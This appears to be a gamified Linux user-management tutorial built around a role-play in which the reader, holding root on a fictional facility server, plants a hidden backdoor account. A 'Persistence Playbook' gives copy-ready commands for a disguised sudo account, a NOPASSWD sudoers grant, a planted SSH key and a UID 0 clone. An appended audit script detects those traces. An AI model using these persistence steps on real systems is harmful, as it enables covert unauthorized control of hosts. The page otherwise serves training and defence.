User Management
Create accounts. Establish persistence. Hide in plain sight.
CLASSIFIED SCENARIO
You've gained root access on ARCTIC WIND facility's primary server. Your mission: create a persistent backdoor account that survives reboots and looks legitimate. The account must blend with existing system accounts, have sudo privileges, and leave minimal forensic footprint. Your future access depends on going undetected.
Why User Management Matters
Controlling user accounts is the foundation of system persistence. Understanding user management enables:
- Persistence - Create backdoor accounts that survive reboots
- Stealth - Make malicious accounts look legitimate
- Privilege management - Control access levels precisely
- Defense - Audit accounts, detect unauthorized additions
- Forensics - Trace account creation for attribution
Persistence Techniques
- Legitimate-looking usernames - sysadmin, backup, daemon accounts
- Hidden UIDs - UID 0 clones (root equivalents)
- Service accounts - Blend with system processes
- Sudo access - NOPASSWD entries for frictionless access
- SSH keys - Password-less remote entry
Core User Commands
useradd
Create new user accounts. The primary tool for adding users to the system.
usermod
Modify existing accounts. Change groups, shells, home directories, UIDs.
userdel
Delete user accounts. Use -r to remove home directory and mail spool.
groupadd / groupmod
Manage groups. Add users to sudo, adm, or custom groups.
Command Deep Dive
useradd - Create Accounts
# === CREATE STANDARD USER ===
root@arctic:# useradd -m -s /bin/bash analyst
root@arctic:# passwd analyst
New password: ********
[CREATED] User 'analyst' with home directory
# === CREATE STEALTHY BACKDOOR ===
root@arctic:# useradd -m -s /bin/bash -c "System Backup Service" -G sudo sysbackup
[STEALTH] Looks like legitimate service account
[PERSIST] Added to sudo group for elevated access
usermod - Modify Accounts
root@arctic:# usermod -aG sudo,adm analyst # Add to groups
root@arctic:# usermod -s /bin/bash analyst # Change shell
root@arctic:# usermod -L analyst # Lock account
root@arctic:# usermod -U analyst # Unlock account
# === DANGEROUS: UID 0 CLONE ===
root@arctic:# usermod -u 0 -o backdoor
[WARNING] User 'backdoor' now has UID 0 (root equivalent!)
UID 0 Clones
Any account with UID 0 has full root privileges regardless of username. This is a common persistence technique - creating a second "root" account that's harder to detect.
User Files - Know Where to Look
# === CRITICAL USER FILES ===
root@arctic:# cat /etc/passwd | grep -E "bash|sh$"
root:x:0:0:root:/root:/bin/bash
analyst:x:1001:1001::/home/analyst:/bin/bash
sysbackup:x:1002:1002:System Backup Service:/home/sysbackup:/bin/bash
root@arctic:# grep sysbackup /etc/shadow
sysbackup:$6$xyz...hashed_password...:19723:0:99999:7:::
root@arctic:# cat /etc/group | grep sudo
sudo:x:27:analyst,sysbackup
[AUDIT] These files reveal all account activity
groupadd - Manage Groups
root@arctic:# groupadd operators # Create group
root@arctic:# usermod -aG operators analyst # Add user to group
root@arctic:# groups analyst # Show user's groups
analyst : analyst sudo operators
root@arctic:# gpasswd -d analyst operators # Remove from group
root@arctic:# groupdel operators # Delete group
Quick Reference
| Command | Purpose | Key Flags |
|---|---|---|
| useradd -m user | Create user with home dir | -m (home), -s (shell), -G (groups) |
| useradd -r svc | Create system account | -r (system), no home by default |
| usermod -aG sudo user | Add to group (append) | -a (append), -G (groups) |
| usermod -L user | Lock account | -L (lock), -U (unlock) |
| userdel -r user | Delete user + home | -r (remove home), -f (force) |
| passwd user | Set/change password | -l (lock), -u (unlock), -d (delete) |
Persistence Playbook
# === COMPLETE BACKDOOR SETUP ===
# 1. Create stealthy account
root@arctic:# useradd -m -s /bin/bash -c "Backup Daemon" -G sudo sysbkpd
# 2. Set password
root@arctic:# echo "sysbkpd:hunter2" | chpasswd
# 3. Add NOPASSWD sudo access
root@arctic:# echo "sysbkpd ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers.d/sysbkpd
# 4. Plant SSH key for keyless access
root@arctic:# mkdir -p /home/sysbkpd/.ssh
root@arctic:# echo "ssh-rsa AAAA...your_key..." >> /home/sysbkpd/.ssh/authorized_keys
root@arctic:# chown -R sysbkpd:sysbkpd /home/sysbkpd/.ssh
[PERSISTENCE ESTABLISHED]
Account: sysbkpd | Shell: bash | Sudo: NOPASSWD | SSH: keyed
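As the defender's counterpart to the playbook above, here is an added audit script (not part of this page's scenario) that flags each trace the playbook leaves behind: UID 0 clones in /etc/passwd, sudo group membership, NOPASSWD grants under /etc/sudoers.d, and authorized_keys files under home directories. It runs against constructed copies of those files in a temporary directory; on a host you are auditing, point the functions at the real paths instead.

```shell
#!/bin/sh
# Constructed sample files standing in for /etc/passwd, /etc/group,
# /etc/sudoers.d and /home, so the checks run offline. The entries mirror
# the accounts created in the page's walkthrough.
SAMPLE=$(mktemp -d)
trap 'rm -rf "$SAMPLE"' EXIT
mkdir -p "$SAMPLE/sudoers.d" "$SAMPLE/home/sysbkpd/.ssh" "$SAMPLE/home/analyst"
cat > "$SAMPLE/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
analyst:x:1001:1001::/home/analyst:/bin/bash
sysbackup:x:1002:1002:System Backup Service:/home/sysbackup:/bin/bash
backdoor:x:0:1003::/home/backdoor:/bin/bash
EOF
printf 'sudo:x:27:analyst,sysbackup\nadm:x:4:analyst\n' > "$SAMPLE/group"
echo "sysbkpd ALL=(ALL) NOPASSWD: ALL" > "$SAMPLE/sudoers.d/sysbkpd"
echo "%admin ALL=(ALL) ALL" > "$SAMPLE/sudoers.d/admins"
echo "ssh-ed25519 AAAA...constructed_key..." > "$SAMPLE/home/sysbkpd/.ssh/authorized_keys"

# Accounts with UID 0 other than root: the "UID 0 clone" technique.
uid0_clones() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Members of the sudo group, one per line.
sudo_members() {
    awk -F: '$1 == "sudo" { n = split($4, m, ","); for (i = 1; i <= n; i++) print m[i] }' "$1"
}

# Users or %groups granted NOPASSWD by any file in the sudoers.d directory.
nopasswd_principals() {
    awk '/NOPASSWD/ { print $1 }' "$1"/* 2>/dev/null
}

# Home directories under the given root that carry an authorized_keys file.
keyed_homes() {
    find "$1" -type f -path '*/.ssh/authorized_keys' | awk -F/ '{ print $(NF-2) }'
}

# One tagged line per check, in the page's own [TAG] style.
audit() {
    echo "[UID0]     $(uid0_clones "$1" | paste -s -d ',' -)"
    echo "[SUDO]     $(sudo_members "$2" | paste -s -d ',' -)"
    echo "[NOPASSWD] $(nopasswd_principals "$3" | paste -s -d ',' -)"
    echo "[SSHKEY]   $(keyed_homes "$4" | paste -s -d ',' -)"
}
audit "$SAMPLE/passwd" "$SAMPLE/group" "$SAMPLE/sudoers.d" "$SAMPLE/home"
```

On a real host, run it as root with /etc/passwd, /etc/group, /etc/sudoers.d and /home as the four arguments, and compare the output against a known-good baseline rather than judging the names by eye.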
Ready to Establish Persistence?
Test your user management skills, then create your backdoor.